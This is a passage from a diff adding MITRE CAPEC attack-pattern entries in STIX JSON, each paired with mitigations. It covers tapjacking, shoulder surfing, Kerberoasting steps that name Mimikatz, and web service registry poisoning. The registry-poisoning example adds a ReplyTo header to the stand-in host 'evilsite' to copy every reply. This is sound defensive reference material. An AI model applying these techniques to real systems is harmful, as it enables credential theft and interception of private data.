credentials) from the user, but may also be used to ride the user's privileges.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06" + ], + "x_capec_prerequisites": [ + "The adversary must already have access to the target system via some means.", + "A legitimate task must exist that an adversary can impersonate to glean credentials.", + "The user's privileges allow them to execute certain tasks with elevated privileges." + ], + "x_capec_resources_required": [ + "Malware or some other means to initially comprise the target system.", + "Additional malware to impersonate a legitimate task." 
+ ], + "x_capec_skills_required": { + "Low": "Once an adversary has gained access to the target system, impersonating a task is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The only known mitigation to this attack is to avoid installing the malicious application on the device. However, to impersonate a running task the malicious application does need the GET_TASKS permission to be able to query the task list, and being suspicious of applications with that permission can help.", + "id": "course-of-action--c40d7d86-ab26-4e1a-9b9b-e3496f0f36fc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-504-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3528ad55-1737-4d7b-b627-6716bbe22c84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c40d7d86-ab26-4e1a-9b9b-e3496f0f36fc", + "spec_version": "2.1", + "target_ref": "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, registers for a URL scheme intended for a target application that has not been installed. Thereafter, messages intended for the target application are handled by the malicious application. 
Upon receiving a message, the malicious application displays a screen that mimics the target application, thereby convincing the user to enter sensitive information. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user as they think that they are interacting with the intended target application.", + "external_references": [ + { + "external_id": "CAPEC-505", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/505.html" + }, + { + "description": "Adrienne Porter Felt, David Wagner, Phishing on Mobile Devices, 2011, University of California, Berkeley", + "external_id": "REF-434", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf" + } + ], + "id": "attack-pattern--ef205569-ee34-491a-b773-5c023e2c1680", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Scheme Squatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The only known mitigation to this attack is to avoid installing the malicious application on the device. 
Applications usually have to declare the schemes they wish to register, so detecting this during a review is feasible.", + "id": "course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-505-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39c2732f-5fa7-44ba-9dab-86cc03c05888", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072", + "spec_version": "2.1", + "target_ref": "attack-pattern--ef205569-ee34-491a-b773-5c023e2c1680", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, displays an interface that misleads the user and convinces them to tap on an attacker desired location on the screen. This is often accomplished by overlaying one screen on top of another while giving the appearance of a single interface. There are two main techniques used to accomplish this. The first is to leverage transparent properties that allow taps on the screen to pass through the visible application to an application running in the background. The second is to strategically place a small object (e.g., a button or text field) on top of the visible screen and make it appear to be a part of the underlying application. 
In both cases, the user is convinced to tap on the screen but does not realize the application that they are interacting with.", + "external_references": [ + { + "external_id": "CAPEC-506", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/506.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Marcus Niemietz, Jorg Schwenk, UI Redressing Attacks on Android Devices, 2012, Horst Gortz Institute for IT-Security", + "external_id": "REF-436", + "source_name": "reference_from_CAPEC", + "url": "https://media.blackhat.com/ad-12/Niemietz/bh-ad-12-androidmarcus_niemietz-WP.pdf" + }, + { + "description": "David Richardson, Look-10-007 - Tapjacking, 2010, Lookout Mobile Security", + "external_id": "REF-437", + "source_name": "reference_from_CAPEC", + "url": "https://blog.lookout.com/look-10-007-tapjacking/" + } + ], + "id": "attack-pattern--79309efd-dd13-41d2-81c6-ec382bced2b4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Tapjacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This pattern of attack requires the ability to execute a malicious application on the user's device. This malicious application is used to present the interface to the user and make the attack possible." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gains physical access to a system or device through theft of the item. 
Possession of a system or device enables a number of unique attacks to be executed and often provides the adversary with an extended timeframe for which to perform an attack. Most protections put in place to secure sensitive information can be defeated when an adversary has physical access and enough time.", + "external_references": [ + { + "external_id": "CAPEC-507", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/507.html" + } + ], + "id": "attack-pattern--debee1d7-930b-4daa-90e0-850d41c80cbd", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Physical Theft", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "This type of attack requires the existence of a physical target that an adversary believes hosts something of value." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of attack, physical security techniques such as locks doors, alarms, and monitoring of targets should be implemented.", + "id": "course-of-action--a86bd9f5-9786-4d89-8d08-8c26d32b9178", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-507-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--150a1d7c-14ac-46f7-9e73-619a5595c6db", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--a86bd9f5-9786-4d89-8d08-8c26d32b9178", + "spec_version": "2.1", + "target_ref": "attack-pattern--debee1d7-930b-4daa-90e0-850d41c80cbd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In a shoulder surfing attack, an adversary observes an unaware individual's keystrokes, screen content, or conversations with the goal of obtaining sensitive information. One motive for this attack is to obtain sensitive information about the target for financial, personal, political, or other gains. From an insider threat perspective, an additional motive could be to obtain system/application credentials or cryptographic keys. Shoulder surfing attacks are accomplished by observing the content \"over the victim's shoulder\", as implied by the name of this attack.", + "external_references": [ + { + "external_id": "CAPEC-508", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/508.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + } + ], + "id": "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Shoulder Surfing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_example_instances": [ + "An adversary can 
capture a target's banking credentials and transfer money to adversary-controlled accounts.", + "An adversary observes the target's mobile device lock screen pattern/passcode and then steals the device, which can now be unlocked.", + "An insider could obtain database credentials for an application and sell the credentials on the black market.", + "An insider overhears a conversation pertaining to classified information, which could then be posted on an anonymous online forum." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary typically requires physical proximity to the target's environment, in order to observe their screen or conversation. This may not be the case if the adversary is able to record the target and obtain sensitive information upon review of the recording." + ], + "x_capec_skills_required": { + "Low": "In most cases, an adversary can simply observe and retain the desired information." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be mindful of your surroundings when discussing or viewing sensitive information in public areas.", + "id": "course-of-action--d898b88c-d850-4a06-bd12-57de9ee9c1e2", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-508-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--190133dc-952f-4cbc-864c-a85cc28a04fe", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--d898b88c-d850-4a06-bd12-57de9ee9c1e2", + "spec_version": "2.1", + "target_ref": "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pertaining to insider threats, ensure that sensitive information is not displayed to nor discussed around individuals without need-to-know access to said information.", + "id": "course-of-action--41704dad-06e1-4a59-9ab2-94b25763a063", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-508-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c24c04d4-0e8d-43c3-bd68-829df5ceff0a", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--41704dad-06e1-4a59-9ab2-94b25763a063", + "spec_version": "2.1", + "target_ref": "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Through the exploitation of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs), the adversary obtains and subsequently cracks the hashed credentials of a service account target to exploit its privileges. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. 
As an authenticated user, the adversary may request Active Directory and obtain a service ticket with portions encrypted via RC4 with the private key of the authenticated account. By extracting the local ticket and saving it disk, the adversary can brute force the hashed value to reveal the target account credentials.", + "external_references": [ + { + "external_id": "CAPEC-509", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/509.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Steal or Forge Kerberos Tickets:Kerberoasting", + "external_id": "T1558.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1558/003" + }, + { + "description": "Jeff Warren, Extracting Service Account Passwords with Kerberoasting, 2017--05---09", + "external_id": "REF-559", + "source_name": "reference_from_CAPEC", + "url": "https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/" + }, + { + "description": "Kerberoasting Without Mimikatz, 2016--11---01", + "external_id": "REF-585", + "source_name": "reference_from_CAPEC", + "url": 
"https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/" + }, + { + "description": "Invoke-Kerberoast", + "external_id": "REF-586", + "source_name": "reference_from_CAPEC", + "url": "https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/" + } + ], + "id": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Kerberoasting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "PowerSploit's Invoke-Kerberoast module can be leveraged to request Ticket Granting Service (TGS) tickets and return crackable ticket hashes. [REF-585] [REF-586]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for user accounts with set SPN values

  2. Techniques
    These can be found via Powershell or LDAP queries, as well as enumerating startup name accounts and other means.
  3. Request service tickets

  4. Techniques
    Using user account's SPN value, request other service tickets from Active Directory

Experiment

  1. Extract ticket and save to disk

  2. Techniques
    Certain tools like Mimikatz can extract local tickets and save them to memory/disk.

Exploit

  1. Crack the encrypted ticket to harvest plain text credentials

  2. Techniques
    Leverage a brute force application/script on the hashed value offline until cracked. The shorter the password, the easier it is to crack.
", + "x_capec_prerequisites": [ + "The adversary requires access as an authenticated user on the system. This attack pattern relates to elevating privileges.", + "The adversary requires use of a third-party credential harvesting tool (e.g., Mimikatz).", + "The adversary requires a brute force tool." + ], + "x_capec_skills_required": { + "Medium": "" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor system and domain logs for abnormal access.", + "id": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--445d759f-d21c-4325-a510-bd6e24de839d", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "spec_version": "2.1", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ a robust password policy for service accounts. 
Passwords should be of adequate length and complexity, and they should expire after a period of time.", + "id": "course-of-action--523888c0-0594-4b49-a1f3-c0cccdcec0eb", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b2a47d13-bffb-4f8b-94f6-aeeb94afc153", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523888c0-0594-4b49-a1f3-c0cccdcec0eb", + "spec_version": "2.1", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ the principle of least privilege: limit service accounts privileges to what is required for functionality and no more.", + "id": "course-of-action--7659d2c2-f9c5-4599-8c79-7d29ae80e31c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8893293-d02b-4ee1-9f85-56386750d82f", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7659d2c2-f9c5-4599-8c79-7d29ae80e31c", + 
"spec_version": "2.1", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.", + "id": "course-of-action--566e2dfe-a0ce-4bcb-8e9d-2fa5450391dc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ee90edd2-2b62-435a-9e2e-f24f212d13ba", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--566e2dfe-a0ce-4bcb-8e9d-2fa5450391dc", + "spec_version": "2.1", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "SOA and Web Services often use a registry to perform look up, get schema information, and metadata about services. 
A poisoned registry can redirect (think phishing for servers) the service requester to a malicious service provider, provide incorrect information in schema or metadata, and delete information about service provider interfaces.", + "external_references": [ + { + "external_id": "CAPEC-51", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/51.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + } + ], + "id": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Poison Web Service Registry", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n WS-Addressing provides location and metadata about the service endpoints. An extremely hard to detect attack is an attacker who updates the WS-Addressing header, leaves the standard service request and service provider addressing and header information intact, but adds an additional WS-Addressing Replyto header. In this case the attacker is able to send a copy (like a cc in mail) of every result the service provider generates. 
So every query to the bank account service, would generate a reply message of the transaction status to both the authorized service requester and an attacker service. This would be extremely hard to detect at runtime.\n http://example.com/Message\n http://valid.example/validClient\n http://evilsite/evilClient\n http://validfaults.example/ErrorHandler\n \n \n In this example \"evilsite\" is an additional reply to address with full access to all the messages that the authorized (validClient) has access to. Since this is registered with ReplyTo header it will not generate a Soap fault.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a target SOA or Web Service: The adversary must first indentify a target SOA or Web Service.

Experiment

  1. Determine desired outcome: Because poisoning a web service registry can have different outcomes, the adversary must decide how they wish to effect the webservice.

  2. Techniques
    An adversary can perform a denial of service attack on a web service.
    An adversary can redirect requests or responses to a malicious service.
  3. Determine if a malicious service needs to be created: If the adversary wishes to redirect requests or responses, they will need to create a malicious service to redirect to.

  4. Techniques
    Create a service to that requests are sent to in addition to the legitimate service and simply record the requests.
    Create a service that will give malicious responses to a service provider.
    Act as a malicious service provider and respond to requests in an arbitrary way.

Exploit

  1. Poison Web Service Registry: Based on the desired outcome, poison the web service registry. This is done by altering the data at rest in the registry or uploading malicious content by spoofing a service provider.

  2. Techniques
    Intercept and change WS-Adressing headers to route to a malicious service or service provider.
    Provide incorrect information in schema or metadata to cause a denial of service.
    Delete information about service procider interfaces to cause a denial of service.
", + "x_capec_extended_description": "\n WS-Addressing is used to virtualize services, provide return addresses and other routing information, however, unless the WS-Addressing headers are protected they are vulnerable to rewriting. Content in a registry is deployed by the service provider. The registry in an SOA or Web Services system can be accessed by the service requester via UDDI or other protocol.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must be able to write to resources or redirect access to the service registry." + ], + "x_capec_resources_required": [ + "Capability to directly or indirectly modify registry resources" + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9eeb3709-308b-45ca-90e5-649033d1458c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Harden registry server and file access permissions", + "id": "course-of-action--cb6669ba-434f-4a26-8a80-93eacd1b68f0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-51-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + 
"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cb6669ba-434f-4a26-8a80-93eacd1b68f0", + "spec_version": "2.1", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement communications to and from the registry using secure protocols", + "id": "course-of-action--6bfceaeb-b87d-430f-aa56-ddb8fa9e9e6f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-51-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dab8cada-a8f1-46a8-a212-2685d9e6bf9d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6bfceaeb-b87d-430f-aa56-ddb8fa9e9e6f", + "spec_version": "2.1", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, performs malicious actions against a third-party Software as a Service (SaaS) application (also known as a cloud 
